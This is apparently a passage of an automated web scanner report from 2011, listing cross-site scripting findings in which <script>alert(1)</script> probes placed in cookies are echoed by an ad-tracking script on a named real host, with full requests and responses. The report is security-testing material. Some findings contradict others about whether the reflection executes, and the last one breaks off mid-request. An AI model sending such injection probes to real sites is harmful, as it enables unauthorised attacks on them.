P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27401

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1160022",Pid:"p84053757",Arc:"1422863",Location:COMS
...[SNIP]...
);
}else{if(window.attachEvent){return window.attachEvent("onload",C.OnReady.onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "UID": '1d29d89e-72.246.30.75-129445681044e5b<script>alert(1)</script>1db2f778374', "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p85001580": 'exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb
...[SNIP]...

2.99. http://ar.voicefive.com/bmx3/broker.pli [ar_da39f516a098b3de) ar_p68511049 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_da39f516a098b3de&#41; ar_p68511049 cookie is copied into the application's response. The payload 41611<script>alert(1)</script>bc2ac2cbbe3 was submitted in the ar_da39f516a098b3de&#41; ar_p68511049 cookie. This input was echoed unmodified in the application's response; the server splits the malformed cookie name on the space and echoes the value under the key ar_p68511049.

Note on the reflection context: the response is served as application/x-javascript and the echoed value lands inside a single-quoted JavaScript string literal in the COMSCORE.BMX.Broker.Cookies object, not between HTML tags. A <script> tag inside a JavaScript string literal is inert, so this particular payload does not execute; a payload containing a single quote would need to be tested to confirm that the string literal can be terminated and arbitrary JavaScript injected.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84053757&PRAd=1160022&AR_C=1422863 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&41611<script>alert(1)</script>bc2ac2cbbe3; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; BMX_BR=pid=p84532700&prad=47146&arc=34917&exp=1297559105; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Feb 2011 14:17:55 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84053757=exp=1&initExp=Sun Feb 13 14:17:55 2011&recExp=Sun Feb 13 14:17:55 2011&prad=1160022&arc=1422863&; expires=Sat 14-May-2011 14:17:55 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297606675; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27401

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1160022",Pid:"p84053757",Arc:"1422863",Location:COMS
...[SNIP]...
ecExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&', "ar_p68511049": 'exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&41611<script>alert(1)</script>bc2ac2cbbe3' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http
...[SNIP]...

2.100. http://ar.voicefive.com/bmx3/broker.pli [ar_p45555483 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p45555483 cookie is copied into the application's response. The payload 3ee78<script>alert(1)</script>334dd945f0f was submitted in the ar_p45555483 cookie. This input was echoed unmodified in the application's response.

Note on the reflection context: the response is served as application/x-javascript and the echoed value lands inside a single-quoted JavaScript string literal in the COMSCORE.BMX.Broker.Cookies object, not between HTML tags. A <script> tag inside a JavaScript string literal is inert, so this particular payload does not execute; a payload containing a single quote would need to be tested to confirm that the string literal can be terminated and arbitrary JavaScript injected.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84053757&PRAd=1160022&AR_C=1422863 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&3ee78<script>alert(1)</script>334dd945f0f; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; BMX_BR=pid=p84532700&prad=47146&arc=34917&exp=1297559105; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Feb 2011 14:17:55 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84053757=exp=1&initExp=Sun Feb 13 14:17:55 2011&recExp=Sun Feb 13 14:17:55 2011&prad=1160022&arc=1422863&; expires=Sat 14-May-2011 14:17:55 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297606675; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27401

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1160022",Pid:"p84053757",Arc:"1422863",Location:COMS
...[SNIP]...
Exp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&3ee78<script>alert(1)</script>334dd945f0f', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&', "ar_p84068139": 'exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:0
...[SNIP]...

2.101. http://ar.voicefive.com/bmx3/broker.pli [ar_p67161473 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p67161473 cookie is copied into the application's response. The payload c7355<script>alert(1)</script>d13449392db was submitted in the ar_p67161473 cookie. This input was echoed unmodified in the application's response.

Note on the reflection context: the response is served as application/x-javascript and the echoed value lands inside a single-quoted JavaScript string literal in the COMSCORE.BMX.Broker.Cookies object, not between HTML tags. A <script> tag inside a JavaScript string literal is inert, so this particular payload does not execute; a payload containing a single quote would need to be tested to confirm that the string literal can be terminated and arbitrary JavaScript injected.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84053757&PRAd=1160022&AR_C=1422863 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&c7355<script>alert(1)</script>d13449392db; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; BMX_BR=pid=p84532700&prad=47146&arc=34917&exp=1297559105; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Feb 2011 14:17:54 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84053757=exp=1&initExp=Sun Feb 13 14:17:54 2011&recExp=Sun Feb 13 14:17:54 2011&prad=1160022&arc=1422863&; expires=Sat 14-May-2011 14:17:54 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297606674; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27401

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1160022",Pid:"p84053757",Arc:"1422863",Location:COMS
...[SNIP]...
oad);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&c7355<script>alert(1)</script>d13449392db', "ar_p84532700": 'exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&', "UID": '1d29d89e-72.246.30.75-1294456810', "ar_p85001580": 'exp=52&initExp=Wed Jan
...[SNIP]...

2.102. http://ar.voicefive.com/bmx3/broker.pli [ar_p83612734 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p83612734 cookie is copied into the application's response. The payload 43c30<script>alert(1)</script>8e3472c0de8 was submitted in the ar_p83612734 cookie. This input was echoed unmodified in the application's response.

Note on the reflection context: the response is served as application/x-javascript and the echoed value lands inside a single-quoted JavaScript string literal in the COMSCORE.BMX.Broker.Cookies object, not between HTML tags. A <script> tag inside a JavaScript string literal is inert, so this particular payload does not execute; a payload containing a single quote would need to be tested to confirm that the string literal can be terminated and arbitrary JavaScript injected.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84053757&PRAd=1160022&AR_C=1422863 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&43c30<script>alert(1)</script>8e3472c0de8; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; BMX_BR=pid=p84532700&prad=47146&arc=34917&exp=1297559105; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Feb 2011 14:17:55 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84053757=exp=1&initExp=Sun Feb 13 14:17:55 2011&recExp=Sun Feb 13 14:17:55 2011&prad=1160022&arc=1422863&; expires=Sat 14-May-2011 14:17:55 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297606675; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27401

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1160022",Pid:"p84053757",Arc:"1422863",Location:COMS
...[SNIP]...
t Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&43c30<script>alert(1)</script>8e3472c0de8', "ar_p84068139": 'exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&', "ar_p68511049": 'exp=8&initExp=Mon Jan 31 16:31:23 2011&
...[SNIP]...

2.103. http://ar.voicefive.com/bmx3/broker.pli [ar_p84053757 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p84053757 cookie is copied into the HTML document as plain text between tags. The payload c50a6<script>alert(1)</script>48d9c10229e was submitted in the ar_p84053757 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84053757&PRAd=1160022&AR_C=1420280 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; BMX_BR=pid=p84532700&prad=47146&arc=34917&exp=1297559105; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; ar_p84053757=exp=1&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:17:53 2011&prad=1160023&arc=1420279&c50a6<script>alert(1)</script>48d9c10229e; BMX_G=method->-1,ts->1297606673; BMX_3PC=1; ar_s_p84053757=1->1297606675; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Feb 2011 14:24:40 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84053757=exp=2&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:24:40 2011&c50a6<script>alert(1)</script>48d9c10229e=&prad=1160022&arc=1420280&; expires=Sat 14-May-2011 14:24:40 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27610

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1160022",Pid:"p84053757",Arc:"1420280",Location:COMS
...[SNIP]...
itExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&', "ar_p84053757": 'exp=1&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:17:53 2011&prad=1160023&arc=1420279&c50a6<script>alert(1)</script>48d9c10229e', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:5
...[SNIP]...

2.104. http://ar.voicefive.com/bmx3/broker.pli [ar_p84068139 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p84068139 cookie is copied into the HTML document as plain text between tags. The payload c2751<script>alert(1)</script>7dc74c224de was submitted in the ar_p84068139 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84053757&PRAd=1160022&AR_C=1422863 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&c2751<script>alert(1)</script>7dc74c224de; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; BMX_BR=pid=p84532700&prad=47146&arc=34917&exp=1297559105; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 13 Feb 2011 14:17:56 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p84053757=exp=1&initExp=Sun Feb 13 14:17:56 2011&recExp=Sun Feb 13 14:17:56 2011&prad=1160022&arc=1422863&; expires=Sat 14-May-2011 14:17:56 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297606676; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27401

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1160022",Pid:"p84053757",Arc:"1422863",Location:COMS
...[SNIP]...
&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&', "ar_p84068139": 'exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&c2751<script>alert(1)</script>7dc74c224de', "ar_p68511049": 'exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.
...[SNIP]...

2.105. http://ar.voicefive.com/bmx3/broker.pli [ar_p84532700 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p84532700 cookie is copied into the HTML document as plain text between tags. The payload d8220<script>alert(1)</script>fb58a5e89b5 was submitted in the ar_p84532700 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p84053757&PRAd=1160022&AR_C=1422863 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
